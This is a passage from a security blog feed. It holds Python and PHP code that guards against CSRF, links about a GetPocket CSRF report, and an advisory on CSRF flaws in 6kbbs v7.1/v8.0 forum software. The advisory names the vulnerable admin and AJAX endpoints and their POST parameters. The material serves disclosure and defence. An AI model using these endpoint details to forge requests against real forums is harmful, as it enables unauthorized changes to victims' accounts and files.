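        return False, f"origin {origin!r} not allowed"
    submitted = request.form.get("csrf_token", "")
    expected = request.session.csrf_token
    # Constant-time comparison so a wrong token cannot be refined by timing.
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return False, "missing or invalid csrf token"
    return True, "ok"


def save_item(request: Request, pocket: List[Dict[str, str]]) -> bool:
    """Append {url, title} to the user's list only when check_csrf passes."""
    ok, _reason = check_csrf(request)
    if ok:
        pocket.append({"url": request.form["url"],
                       "title": request.form.get("title", "")})
    return ok


def demo() -> Dict[str, object]:
    """Run the guard over constructed requests and return every verdict."""
    victim = Session(user="victim")
    pocket: List[Dict[str, str]] = []
    item = {"url": "http://make.wordpress.org/core/2014/01/15/git-mirrors-for-wordpress",
            "title": "csrf test"}
    third_party = "http://itinfotech.tumblr.com"   # the lure page named in the post
    verdicts: Dict[str, object] = {}
    # [1] from the post: a bare link on the third-party page the victim clicks.
    link_click = Request("GET", {"Referer": third_party + "/"}, dict(item), victim)
    verdicts["get_link"] = check_csrf(link_click)
    # An auto-submitting form on the same third-party page.
    forged_post = Request("POST", {"Origin": third_party}, dict(item), victim)
    verdicts["cross_origin_post"] = check_csrf(forged_post)
    # First-party page, but the token is missing or guessed.
    bad_token = Request("POST", {"Origin": "https://getpocket.com"},
                        dict(item, csrf_token="guess"), victim)
    verdicts["same_origin_bad_token"] = check_csrf(bad_token)
    # The genuine save form: POST, first-party origin, valid session token.
    legit = Request("POST", {"Origin": "https://getpocket.com"},
                    dict(item, csrf_token=victim.csrf_token), victim)
    verdicts["legitimate_post"] = check_csrf(legit)
    verdicts["saved"] = save_item(legit, pocket)
    verdicts["saved_count"] = len(pocket)
    return verdicts
```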
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="line-height: 21px; margin-bottom: 1.3em;">
<div style="line-height: 25.2px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><span style="line-height: 25.2px;"><span style="line-height: 25.2px;"><b>PoC Video:</b></span></span> <a data-mce-href="http://www.youtube.com/watch?v=Kg743VboyoU&feature=youtu.be" href="http://www.youtube.com/watch?v=Kg743VboyoU&feature=youtu.be" rel="nofollow" style="line-height: 25.2px;">http://www.youtube.com/watch?v=Kg743VboyoU&feature=youtu.be</a></span></span></div>
<div style="line-height: 25.2px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="line-height: 25.2px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
</div>
<div style="margin-bottom: 1.3em;">
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="background-color: white; line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Blog Detail:</b></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://webtechwire.wordpress.com/2014/04/29/getpocket-csrf/">https://webtechwire.wordpress.com/2014/04/29/getpocket-csrf/</a></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/blog/csrf-vulnerability/getpocket-csrf-vulnerability/" style="line-height: 28px;">http://www.tetraph.com/blog/csrf-vulnerability/getpocket-csrf-vulnerability/</a></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://computerobsess.blogspot.com/2014/10/getpocket-csrf-vulnerability.html">http://computerobsess.blogspot.com/2014/10/getpocket-csrf-vulnerability.html</a></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blog.163.com/blog/static/23460305120143201422975/">http://tetraph.blog.163.com/blog/static/23460305120143201422975/</a></span></span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="background-color: white; font-size: small; line-height: 28px;"><br /></span></span><br />
<div style="background-color: white; line-height: 25.2px;">
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6000003814697px; margin: 0px; orphans: auto; outline: none; padding: 0px; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;">Discoverer and Reporter:</span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6000003814697px; margin: 0px; orphans: auto; outline: none; padding: 0px; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 19.6px;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore.</span><span style="line-height: 28px;"> (<a href="https://twitter.com/justqdjing/status/558921275054096384">@justqdjing</a>)</span></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6000003814697px; margin: 0px; orphans: auto; outline: none; padding: 0px; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="-webkit-transition: color 0.3s; font-size: small; line-height: 28px; outline: none; transition: color 0.3s;"><a href="http://www.tetraph.com/wangjing" style="-webkit-transition: color 0.3s; display: inline; outline: none; text-decoration: none; transition: color 0.3s;" target="_blank">http://www.tetraph.com/<wbr></wbr>wangjing</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6000003814697px; margin: 0px; orphans: auto; outline: none; padding: 0px; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6000003814697px; margin: 0px; orphans: auto; outline: none; padding: 0px; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6000003814697px; margin: 0px; orphans: auto; outline: none; padding: 0px; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-85680954250928331242015-06-14T02:13:00.000-07:002015-06-14T02:13:00.632-07:00CXSecurity WLB-2015040034 6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Web Security Vulnerabilities<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkR67HVkFOrp5v-MdBNhIXjcBqnUqX9FzKVZ_s9TGH0dvDDzGX40Dy6C4yIvHBmau7WPDJjgAxBXBu8LHkeFVNqbyB0q3i-cFFcIZ7h0CTqY_Fzn_XGK8jA28mOVoFvKErTfBOAp2OKBI/s1600/6kbbs_3.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkR67HVkFOrp5v-MdBNhIXjcBqnUqX9FzKVZ_s9TGH0dvDDzGX40Dy6C4yIvHBmau7WPDJjgAxBXBu8LHkeFVNqbyB0q3i-cFFcIZ7h0CTqY_Fzn_XGK8jA28mOVoFvKErTfBOAp2OKBI/s400/6kbbs_3.png" style="cursor: move;" width="400" /></a></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">CXSecurity WLB-2015040034 6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Web Security Vulnerabilities</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: 6kbbs Multiple CSRF (Cross-Site Request Forgery) Security Vulnerabilities</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: 6kbbs</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Product: 6kbbs</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: v7.1 v8.0</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: v7.1 v8.0</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: April 02, 2015</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: April 02, 2015</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Cross-Site Request Forgery (CSRF) [CWE-352]</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CXSecurity Reference: WLB-2015040034 </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact CVSS Severity (version 2.0):</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 6.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:P)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 6.4</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Version 2 Metrics:</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Complexity: Medium</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Authentication: Not required to exploit</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Writer and Reporter: <span style="background-color: white; line-height: 18.2000007629395px;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (</span><a href="https://twitter.com/justqdjing/status/583550839408627712">@justqdjing</a><span style="background-color: white; line-height: 18.2000007629395px;">)</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Suggestion Details:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Vendor:</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product & Vulnerable Versions:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">v7.1</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">v8.0</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & download:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs can be obtained from here:</span></div>
<div style="margin: 0px;">
<a href="http://www.6kbbs.com/download.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.6kbbs.com/download.html</span></a></div>
<div style="margin: 0px;">
<a href="http://en.sourceforge.jp/projects/sfnet_buzhang/downloads/6kbbs.zip/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://en.sourceforge.jp/projects/sfnet_buzhang/downloads/6kbbs.zip/</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction Overview:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the code simple, easy to use, powerful, fast and so on. It is an excellent community forum program. The program is simple but not simple; fast, small; Interface generous and good scalability; functional and practical pursuing superior performance, good interface, the user's preferred utility functions."</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"1, using XHTML + CSS architecture, so that the structure of the page, saving transmission static page code, but also easy to modify the interface, more in line with WEB standards; 2, the Forum adopted Cookies, Session, Application and other technical data cache on the forum, reducing access to the database to improve the performance of the Forum. Can carry more users simultaneously access; 3, the data points table function, reduce the burden on the amount of data when accessing the database; 4, support for multi-skin style switching function; 5, the use of RSS technology to support subscriptions forum posts, recent posts, user's posts; 6, the display frame mode + tablet mode, the user can choose according to their own preferences to; 7. forum page optimization keyword search, so the forum more easily indexed by search engines; 8, extension, for our friends to provide a forum for a broad expansion of space services; 9, webmasters can add different top and bottom of the ad, depending on the layout; 10, post using HTML + UBB way the two editors, mutual conversion, compatible with each other; ..."</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The 6kbbs web application is vulnerable to CSRF (Cross-Site Request Forgery). An attacker may trick an authenticated victim into clicking on or loading a crafted image, abusing the trust relationship between the victim's browser session and the application: the forged request is executed in the context of the victim's session, without further prompting or verification. Such an attack could trick the victim into creating files that may then be invoked via a separate CSRF attack or possibly by other means.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several 0-day vulnerabilities in 6kbbs products have been found by other bug hunters before, and 6kbbs has patched some of them. The Open Sourced Vulnerability Database (OSVDB) is an independent, open-source database whose goal is to provide accurate, detailed, current, and unbiased technical information on security vulnerabilities; the project promotes greater, open collaboration between companies and individuals. It has published suggestions, advisories and solution details related to CSRF vulnerabilities.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>The first flaw occurs at the "/portalchannel_ajax.php?" page, with the "&id" and "&code" parameters in the HTTP POST body.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2) </b>The second flaw occurs at the "/admin.php?" page, with the "&fileids" parameter in the HTTP POST body.</span></div>
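<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The fix a defender would apply to state-changing POST handlers such as the two named above is a per-session anti-CSRF token. The following is an added example written for this post, not code from 6kbbs or from the original advisory; the handler, the session and field names, and the "fileids" action are illustrative assumptions. The token is generated from PHP's CSPRNG, embedded in forms as a hidden field, validated with a constant-time compare, and requests whose Origin header does not match the site's own origin are rejected as a second layer.</span></div>

```php
<?php
// Added example (not 6kbbs code): synchronizer-token CSRF protection for a
// PHP form or AJAX handler that changes state. Endpoint, parameter and
// session-key names below are illustrative assumptions, not 6kbbs internals.

declare(strict_types=1);

// Harden the session cookie before the session starts (array form needs PHP >= 7.3).
// 'secure' => true assumes the forum is served over HTTPS.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

const CSRF_SESSION_KEY = 'csrf_token';   // where the token lives in $_SESSION
const CSRF_FIELD       = 'csrf_token';   // name of the hidden form field / POST key

/** Return the per-session token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION[CSRF_SESSION_KEY])) {
        // 32 bytes from the CSPRNG, hex-encoded so it is safe to embed in HTML.
        $_SESSION[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_SESSION_KEY];
}

/** Hidden input to embed in every form whose submission changes state. */
function csrf_field(): string
{
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Validate a request against the session token.
 * Returns true only for a POST request that carries a token equal to the
 * session token (constant-time compare) and, if the browser sent an Origin
 * header, whose Origin is this site's own origin.
 */
function csrf_request_is_valid(array $server, array $post, string $sessionToken): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;   // state changes must never be reachable via GET
    }

    $sent = $post[CSRF_FIELD] ?? '';
    if (!is_string($sent) || $sent === '' || !hash_equals($sessionToken, $sent)) {
        return false;   // missing or mismatched token
    }

    if (isset($server['HTTP_ORIGIN'])) {
        // Defence in depth: a cross-site form post carries the attacker's Origin.
        $scheme   = (!empty($server['HTTPS']) && $server['HTTPS'] !== 'off') ? 'https' : 'http';
        $expected = $scheme . '://' . ($server['HTTP_HOST'] ?? '');
        if (strcasecmp($server['HTTP_ORIGIN'], $expected) !== 0) {
            return false;
        }
    }
    return true;
}

// Illustrative handler: guard the privileged action before touching $_POST.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_request_is_valid($_SERVER, $_POST, csrf_token())) {
        http_response_code(403);
        // Log the rejection: repeated failures from one source are a useful detection signal.
        error_log('CSRF check failed for ' . ($_SERVER['REQUEST_URI'] ?? '?')
            . ' from ' . ($_SERVER['REMOTE_ADDR'] ?? '?'));
        exit('Request rejected: missing or invalid CSRF token.');
    }
    // ... only now act on the request, e.g. delete the files listed in
    // $_POST['fileids'] (hypothetical parameter handling) ...
}
```

<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Embed csrf_field() in every form whose submission changes state and call csrf_request_is_valid() at the top of each handler before any work is done. The Origin comparison is a second layer only, since some older browsers omit the header on same-site form posts, which is why the token stays mandatory; the SameSite cookie attribute likewise narrows when the session cookie is sent cross-site but does not replace the token check.</span></div>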
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Related Articles:</span></b></div>
<div style="margin: 0px;">
<a href="http://cxsecurity.com/issue/WLB-2015040034"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://cxsecurity.com/issue/WLB-2015040034</span></a></div>
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/04/05/7"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/04/05/7</span></a></div>
<div style="margin: 0px;">
<a href="http://www.intelligentexploit.com/view-details.html?id=21071"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.intelligentexploit.com/view-details.html?id=21071</span></a></div>
<div style="margin: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1819"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1819</span></a></div>
<div style="margin: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure@seclists.org/msg01902.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure@seclists.org/msg01902.html</span></a></div>
<div style="margin: 0px;">
<a href="http://seclists.org/fulldisclosure/2015/Apr/13"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Apr/13</span></a></div>
<div style="margin: 0px;">
<a href="http://www.tetraph.com/security/csrf-vulnerability/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/security/csrf-vulnerability/6kbbs-v8-0-csrf</span></a></div>
<div style="margin: 0px;">
<a href="http://essayjeans.blog.163.com/blog/static/237173074201551435316925/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://essayjeans.blog.163.com/blog/static/237173074201551435316925/</span></a></div>
<div style="margin: 0px;">
<a href="https://itinfotechnology.wordpress.com/2015/04/14/6kbbs-crsf/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itinfotechnology.wordpress.com/2015/04/14/6kbbs-crsf/</span></a></div>
<div style="margin: 0px;">
<a href="http://frenchairing.blogspot.fr/2015/06/6kbbs-crsf.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://frenchairing.blogspot.fr/2015/06/6kbbs-crsf.html</span></a></div>
<div style="margin: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/234603051201551444917365/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/234603051201551444917365/</span></a></div>
<div style="margin: 0px;">
<a href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/6kbbs-v8-0-csrf</span></a></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/04/6kbbs-v80-multiple-csrf-cross-site.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/04/6kbbs-v80-multiple-csrf-cross-site.html</span></a></div>
<div style="margin: 0px;">
<a href="https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-multiple-csrf</span></a></div>
<div style="margin: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-csrf</span></a></div>
<div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-61182958285487221002015-06-14T01:11:00.000-07:002015-06-14T01:11:35.970-07:00OSVDB 120807 NetCat CMS 3.12 HTML Injection Web Security Vulnerabilities<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy6Vd783IIPUsUWFKP2SrE1h2ohW2WhgOmXZ_7uDU0zlmsCzDdiUjqnBtrOFf_syO3-SogBomceVFfnNcOqh_Y7vFf7ALO6R-LYwzfLP0hXQ95IymaJmnz4E2GxkGHLeUA5oI8J_YSs8o/s1600/netcat_3.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy6Vd783IIPUsUWFKP2SrE1h2ohW2WhgOmXZ_7uDU0zlmsCzDdiUjqnBtrOFf_syO3-SogBomceVFfnNcOqh_Y7vFf7ALO6R-LYwzfLP0hXQ95IymaJmnz4E2GxkGHLeUA5oI8J_YSs8o/s400/netcat_3.png" style="cursor: move;" width="400" /></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">OSVDB 120807 NetCat CMS 3.12 HTML Injection Web Security Vulnerabilities</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
